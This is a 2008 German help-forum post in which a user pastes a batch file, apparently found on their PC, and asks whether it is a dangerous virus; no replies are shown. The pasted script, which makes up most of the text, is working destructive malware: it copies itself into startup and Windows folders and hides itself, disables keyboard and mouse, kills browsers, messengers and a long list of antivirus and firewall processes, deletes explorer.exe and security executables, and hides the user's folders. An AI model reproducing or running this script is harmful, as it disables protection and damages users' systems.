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Mülltonne: Gefährlicher Virus oder nicht?

Windows 7 Beiträge, die gegen unsere Regeln verstoßen haben, solche, die die Welt nicht braucht oder sonstiger Müll landet hier in der Mülltonne...

Alt 18.07.2008, 15:24   #1
Gefährlicher Virus oder nicht? - Standard

Gefährlicher Virus oder nicht?


ich ahbe folgendes Problem: ich denke das ich einen virus habe,bin mir aber nicht ganz sicher.Ich bin mir nicht ganz sicher ob es nur ein fake virus ist oder ob er schaden anrichtet
ich ahbe herrausgefunden wie die datei aufgebaut ist und was dirnne enthalten ist.Nun meine frage:
Ist der Virus gefährlich? ist es überhaupt einer?

@echo off

copy "kill.bat" "C:\WINDOWS"

attrib +r +h +s "kill.bat"

copy "kill.bat" "C:\Documents and Settings\MARCO ANTONIO\Start Menu\Programs\startup"

copy "kill.bat" "C:\"

copy "kill.bat" "C:\Documents and Settings\MARCO ANTONIO\My Documents"

Reg Add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /f /d "10"

rundll32 keyboard, disable

rundll32 mouse, disable

taskkill explorer /t /t

taskkill ccapp /t /f

taskkill mcdetect /f /t

taskkill McAfee security Center Module

taskkill yahoomessenger /f /t

taskkill msmsgs /t /f

taskkill firefox /f /t

taskkill iexplore /f /t

taskkill _Avp32.exe

taskkill _Avpcc.exe

taskkill _Avpm.exe

taskkill Ackwin32.exe

taskkill Agnitum Outpost Firewall

taskkill Anti-Trojan.exe

taskkill ANTIVIR

taskkill Apvxdwin.exe

taskkill ATRACK

taskkill Autodown.exe

taskkill AVCONSOL

taskkill Avconsol.exe

taskkill Ave32.exe

taskkill Avgctrl.exe

taskkill Avkserv.exe

taskkill Avnt.exe

taskkill Avp.exe

taskkill AVP.EXE

taskkill AVP32

taskkill Avp32.exe

taskkill Avpcc.exe

taskkill Avpdos32.exe

taskkill Avpm.exe

taskkill Avptc32.exe

taskkill Avpupd.exe

taskkill Avsched32.exe

taskkill AVSync Manager

taskkill AVSYNMGR

taskkill Avwin95.exe

taskkill Avwupd32.exe

taskkill Blackd.exe

taskkill BLACKICE

taskkill BlackICE Defender

taskkill Blackice.exe

taskkill CA Sessionwall-3

taskkill Cfiadmin.exe

taskkill Cfiaudit.exe

taskkill CFINET

taskkill Cfinet.exe

taskkill CFINET32

taskkill Cfinet32.exe

taskkill Claw95.exe

taskkill Claw95cf.exe

taskkill Cleaner.exe

taskkill Cleaner3.exe

taskkill Defwatch

taskkill Defwatch.exe

taskkill Dvp95.exe

taskkill Dvp95_0.exe

taskkill Ecengine.exe

taskkill eSafe Protect Desktop

taskkill Esafe.exe

taskkill Espwatch.exe

taskkill eTrust EZ Firewall

taskkill F-Agnt95.exe

taskkill Findviru.exe

taskkill Fprot.exe

taskkill F-Prot.exe

taskkill F-PROT95

taskkill F-Prot95.exe

taskkill FP-WIN

taskkill Fp-Win.exe

taskkill "Freedom 2"

taskkill Frw.exe

taskkill F-STOPW

taskkill F-Stopw.exe

taskkill GNAT Box Lite

taskkill IAMAPP

taskkill Iamapp.exe

taskkill Iamserv.exe

taskkill Ibmasn.exe

taskkill Ibmavsp.exe

taskkill Icload95.exe

taskkill Icloadnt.exe

taskkill ICMON

taskkill Icmon.exe

taskkill Icsupp95.exe

taskkill Icsuppnt.exe

taskkill Iface.exe

taskkill Internet Alert 99

taskkill IOMON98

taskkill Iomon98.exe

taskkill Jedi.exe

taskkill LOCKDOWN2000

taskkill Lockdown2000.exe

taskkill Look'n'Stop

taskkill Look'n'Stop Lite

taskkill Lookout.exe

taskkill LUALL

taskkill Luall.exe


taskkill MCAFEE

taskkill McAfee Firewall

taskkill McAfee Internet Guard Dog Pro

taskkill Moolive.exe

taskkill Mpftray.exe

taskkill N32scanw.exe

taskkill NAVAPSVC

taskkill NAVAPW32

taskkill Navapw32.exe

taskkill NAVLU32

taskkill Navlu32.exe

taskkill Navnt.exe

taskkill NAVRUNR

taskkill NAVW32

taskkill Navw32.exe

taskkill NAVWNT

taskkill Navwnt.exe

taskkill NeoWatch

taskkill NISSERV

taskkill NISUM

taskkill Nisum.exe

taskkill NMAIN

taskkill Nmain.exe

taskkill Norman Personal Firewall

taskkill Normist.exe

taskkill NORTON

taskkill Norton AntiVirus Server

taskkill Norton Internet Security

taskkill Norton Personal Firewall 2001

taskkill Nupgrade.exe

taskkill NVC95

taskkill Nvc95.exe

taskkill Outpost.exe

taskkill Padmin.exe

taskkill Pavcl.exe

taskkill Pavsched.exe

taskkill Pavw.exe

taskkill Pc firewall

taskkill PC Viper

taskkill PCCIOMON

taskkill PCCMAIN

taskkill PCCWIN98

taskkill Pccwin98.exe

taskkill Pcfwallicon.exe

taskkill Persfw.exe

taskkill PGP Gauntlet

taskkill POP3TRAP

taskkill Proxy +

taskkill PVIEW95

taskkill Rav7.exe

taskkill Rav7win.exe

taskkill Rescue.exe

taskkill RESCUE32

taskkill SAFEWEB

taskkill Safeweb.exe

taskkill Scan32.exe

taskkill Scan95.exe

taskkill Scanpm.exe

taskkill Scrscan.exe

taskkill Serv95.exe

taskkill Smc.exe


taskkill Snort - Win32 GUI

taskkill Snort (Intrusion Detection System)

taskkill Sphinx.exe

taskkill Sphinxwall

taskkill Sweep95.exe

taskkill Sybergen Secure Desktop

taskkill Sybergen SyGate


taskkill Tbscan.exe

taskkill Tca.exe

taskkill Tds2-98.exe

taskkill Tds2-Nt.exe

taskkill TermiNET

taskkill TGB:BOB

taskkill Tiny Personal Firewall

taskkill Vet95.exe

taskkill Vettray.exe

taskkill Vscan40.exe

taskkill Vsecomr.exe

taskkill VSHWIN32

taskkill Vshwin32.exe

taskkill VSSTAT

taskkill Vsstat.exe

taskkill WEBSCANX

taskkill Webscanx.exe

taskkill WEBTRAP

taskkill Wfindv32.exe

taskkill Wingate

taskkill WinProxy

taskkill WinRoute

taskkill WyvernWorks Firewall

taskkill Zonealarm

taskkill Zonealarm.exe

taskkill AVP32

taskkill LOCKDOWN2000

taskkill AVP.EXE

taskkill CFINET32

taskkill CFINET

taskkill ICMON

taskkill SAFEWEB

taskkill WEBSCANX

taskkill ANTIVIR

taskkill MCAFEE

taskkill NORTON

taskkill NVC95

taskkill FP-WIN

taskkill IOMON98

taskkill PCCWIN98

taskkill F-PROT95

taskkill F-STOPW

taskkill PVIEW95

taskkill NAVWNT

taskkill NAVRUNR

taskkill NAVLU32

taskkill NAVAPSVC

taskkill NISUM


taskkill RESCUE32

taskkill NISSERV

taskkill ATRACK

taskkill IAMAPP


taskkill LUALL

taskkill NMAIN

taskkill NAVW32

taskkill NAVAPW32

taskkill VSSTAT

taskkill VSHWIN32

taskkill AVSYNMGR

taskkill AVCONSOL

taskkill WEBTRAP

taskkill POP3TRAP

taskkill PCCMAIN

taskkill PCCIOMON

time 24:00

del "C:\WINDOWS\explorer.exe" /f /q

del "C:\Program Files\mcafee.com\agent\mcdetect.exe"/q /f

del "C:\Archivos de programa\messenger\msmsgs.exe" /q /f

del "C:\Archivos de programa\Yahoo!\messenger\YahooMessenger.exe" /q /f

attrib +r +h "C:\Documents and Settings\MARCO ANTONIO\My Documents\My Music"

attrib +r +h "C:\Documents and Settings\MARCO ANTONIO\My Documents\My Pictures"

attrib +r +h "C:\Documents and Settings\MARCO ANTONIO\My Documents\My Videos"

attrib +r +h "C:\Documents and Settings\MARCO ANTONIO\My Documents"

attrib +r +h "C:\WINDOWS"


Themen zu Gefährlicher Virus oder nicht?
agent, alert, antivirus, avp, datei, dll, explorer, explorer.exe, fake, fake virus, firefox, folge, frage, gefährlich, gefährlich?, heulen, iexplore, internet, mcafee, norman, problem, proxy, secure, security, start, start menu, system, virus, windows

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Zum Thema Gefährlicher Virus oder nicht? - Hallo, ich ahbe folgendes Problem: ich denke das ich einen virus habe,bin mir aber nicht ganz sicher.Ich bin mir nicht ganz sicher ob es nur ein fake virus ist oder - Gefährlicher Virus oder nicht?...
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